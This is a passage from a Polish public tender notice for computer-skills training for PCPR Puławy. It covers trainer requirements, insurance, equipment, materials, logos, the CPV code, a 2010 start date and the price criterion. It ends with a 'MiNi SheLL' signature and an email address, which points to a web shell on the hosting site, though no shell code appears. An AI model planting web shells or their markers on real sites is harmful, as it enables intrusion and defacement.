Wykształcenie co najmniej średnie z zakresu informatyki z przygotowaniem pedagogicznym bądź z co najmniej 2-letnim doświadczeniem w prowadzeniu szkoleń z zakresu obsługi komputera. Przez doświadczenie, o którym mowa należy rozumieć pozostawanie w stosunku pracy lub zlecenia z firmą bądź instytucją prowadzącą tego typu szkolenia, kursy. 

7.	Inne wymagania:

a)	wykonawca zapewnić ma wszystkim uczestnikom szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na czas trwania szkolenia,

b)	sale szkoleniowe mają być wyposażone w stanowiska komputerowe wraz z dostępem do internetu, dla każdego uczestnika danej grupy podczas szkolenia,

c)	wykonawca zapewnić ma dla każdego uczestnika materiały szkoleniowe niezbędne do realizacji zajęć oraz materiały biurowe dla każdego uczestnika tj.  po 1 notatniku A-4 i po 1 długopisie, które po zakończeniu szkolenia staną się własnością uczestników;
Wszystkie materiały wydane uczestnikom mają być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL,

d)uczestnicy otrzymają zaświadczenie o ukończeniu szkolenia, które ma być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com